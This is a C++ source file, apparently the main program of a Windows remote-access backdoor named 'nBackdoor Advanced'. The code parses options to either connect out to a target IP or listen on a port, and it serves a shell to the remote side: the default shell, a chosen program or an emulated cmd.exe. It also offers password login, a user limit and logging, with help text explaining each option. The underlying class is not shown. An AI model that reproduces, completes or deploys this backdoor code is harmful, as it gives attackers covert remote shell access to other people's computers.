#include "CnBackdoor.h"
#include <string>
#include <iostream>

CNBACKDOOR* p;								// pointer to the CnBackdoor instance from within main()
void ShowHelp(char * exe);					// Prototype of the help instructions function.
bool UseConnect = false;					// -c ?
bool UseListen = false;						// or -l ?

void WINAPI _CtrlHandler(unsigned long CtrlType)
{
    switch (CtrlType)
    {
		case CTRL_C_EVENT:
		case CTRL_BREAK_EVENT:
		case CTRL_CLOSE_EVENT:
		case CTRL_LOGOFF_EVENT:
		case CTRL_SHUTDOWN_EVENT:
			p->CtrlHandler(UseConnect, UseListen);
			break;
		default:
			break;
	}
}

int main(int argc, char * argv[])
{
	CNBACKDOOR CnBackdoor;
	p = &CnBackdoor;
	std::cout << std::endl;
	std::cout << "                     nBackdoor Advanced"							<< std::endl;
	std::cout << "                     Version " << CnBackdoor.version()			<< std::endl;
	std::cout << "                     Made by " << CnBackdoor.author()				<< std::endl;
	std::cout << "            -----------------------------------"					<< std::endl;

	std::cout << std::endl;

	if (argc < 2)
	{
		/*
			In case the user didnt supplied any parameters, show the help instructions, and
			return 1 as an error indicating something went wrong :)
			The help function is declared as prototype above, so you can call it from anywhere in the code.
		*/
		ShowHelp(argv[0]);
		return 1;
	}


	/*
		Here is the real parsing (a_n = argv index number).
		we start at 1, we dont need to parse the program name (argv[0]).
	*/
	for (int a_n = 1; a_n < argc; a_n++)
	{
		if (strcmp(argv[a_n], "-c") == 0)				// connect to ip
		{
			if (UseListen)
			{
				std::cout << "[-] Can't use connect and listen together" << std::endl;
				return 1;
			}
			else
			{
				UseConnect = true;
				CnBackdoor.log_opt.ip = argv[++a_n];
			}
		}
		else if (strcmp(argv[a_n], "-l") == 0)			// listen
		{
			if (UseConnect)
			{
				std::cout << "[-] Can't use listen and connect together" << std::endl;
				return 1;
			}
			else
				UseListen = true;
		}
		else if (strcmp(argv[a_n], "-p") == 0)			// port
			CnBackdoor.log_opt.port = atoi(argv[++a_n]);
		else if (strcmp(argv[a_n], "-s") == 0)
		{
			switch (atoi(argv[++a_n]))
			{
			case 1:
				CnBackdoor.log_opt.ShellType = 1;
				break;
			case 2:
				CnBackdoor.log_opt.ShellType = 2;
				CnBackdoor.log_opt.ShellProgram = argv[++a_n];
				if (!CnBackdoor.log_opt.ShellProgram)
				{
					std::cout << "[-] Missing custom program" << std::endl;
					return 1;
				}
				break;
			case 3:
				CnBackdoor.log_opt.ShellType = 3;
				break;
			default:
				std::cout << "[-] Invalid shell type " << atoi(argv[a_n]) << std::endl;
				return 1;
				break;
			}
		}
		else if (strcmp(argv[a_n], "-P") == 0)			// password
		{
			CnBackdoor.log_opt.pass = argv[++a_n];
			if (CnBackdoor.log_opt.pass && strlen(CnBackdoor.log_opt.pass) > MAX_PASSWORD_LENGTH)
			{
				std::cout << "Password length too long, max length: " << MAX_PASSWORD_LENGTH << std::endl;
				return 1;
			}
		}
		else if (strcmp(argv[a_n], "-h") == 0)
		{
			ShowHelp(argv[0]);
			return 0;
		}
		else if (strcmp(argv[a_n], "-L") == 0)
			CnBackdoor.log_opt.UseLog = true;
		else if (strcmp(argv[a_n], "-u") == 0)
			CnBackdoor.log_opt.max_users = atoi(argv[++a_n]);
		else if (strcmp(argv[a_n], "-U") == 0)
			CnBackdoor.log_opt.UniqueShell = true;
		else if (strcmp(argv[a_n], "-t") == 0)
			CnBackdoor.log_opt.timeout = atoi(argv[++a_n]);
		else
		{
			ShowHelp(argv[0]);
			return 1;
		}
	}

	/*
		Error check the given argv's depending on what has been given.
		First we check the parameters required for both connect and listen.
		After that each option dependant.
	*/
	if (!CnBackdoor.log_opt.port)
	{
		std::cout << "[-] Missing port" << std::endl;
		return 1;
	}

	SetConsoleCtrlHandler((PHANDLER_ROUTINE)_CtrlHandler, true);
	if (UseConnect)
	{
		if (!CnBackdoor.log_opt.ip)
		{
			std::cout << "[-] Missing target IP" << std::endl;
			return 1;
		}

		SOCKET socket_id;
		if (!(socket_id = CnBackdoor.ConnectTo(CnBackdoor.log_opt.ip, CnBackdoor.log_opt.port)))
		{
			std::cout << "[-] Failed to connect to " << CnBackdoor.log_opt.ip <<
				" (" << h_errno << ")" << std::endl;
			return 1;
		}
		else
			CnBackdoor.SendRecv(socket_id, CnBackdoor.log_opt.ip);
	}
	else if (UseListen)
	{
		if (!CnBackdoor.Listen())		// this function only returns on error
		{
			std::cout << "[-] Failed to listen on " << CnBackdoor.log_opt.port <<
				" (" << h_errno << ")" << std::endl;
			return 1;
		}
	}
	else
	{
		ShowHelp(argv[0]);
		return 1;
	}


	/*
		No strange things happened, return if argc were valid,
		0 indicating nothing weird happened.
		return 0 at main sets %errorlevel% to 0,
		probaly something similar happens on *unix Operating Systems.
	*/
	return 0;
}

void ShowHelp(char * exe)
{
		std::cout << "     nBackdoor usage:  <options>  <params>"									<< std::endl;
		std::cout << std::endl;
		std::cout << "       <options>         <params>           <descr>"							<< std::endl;
		std::cout << "          -c              Target IP          Connect to target IP"			<< std::endl;
		std::cout << "          -p              Port               Port to connect to"				<< std::endl;
		std::cout << "          -L                                 Enable logging"					<< std::endl;
		std::cout << std::endl;
		std::cout << "          -l                                 Listen mode"						<< std::endl;
		std::cout << "          -p              Port               Port to listen on"				<< std::endl;
		std::cout << "          -s              Shell ID           Use ID as shell parameter"		<< std::endl;
		std::cout << "                          ID's: 1            Default shell program"			<< std::endl;
		std::cout << "                                2 <file>     File as shell program"			<< std::endl;
		std::cout << "                                3            Emulated cmd.exe shell"			<< std::endl;
		std::cout << "          -P              Password           Password for login"				<< std::endl;
		std::cout << "          -L                                 Enable logging"					<< std::endl;
		std::cout << "          -u              Users              Max concurrent connections"		<< std::endl;
		// TODO:
		//std::cout << "          -U                                 Unique shell"					<< std::endl;
		std::cout << "          -t              Timeout            Idle timeout (in seconds)"		<< std::endl;
		std::cout << std::endl;
		std::cout << "          -h                                 Show help message"				<< std::endl;
}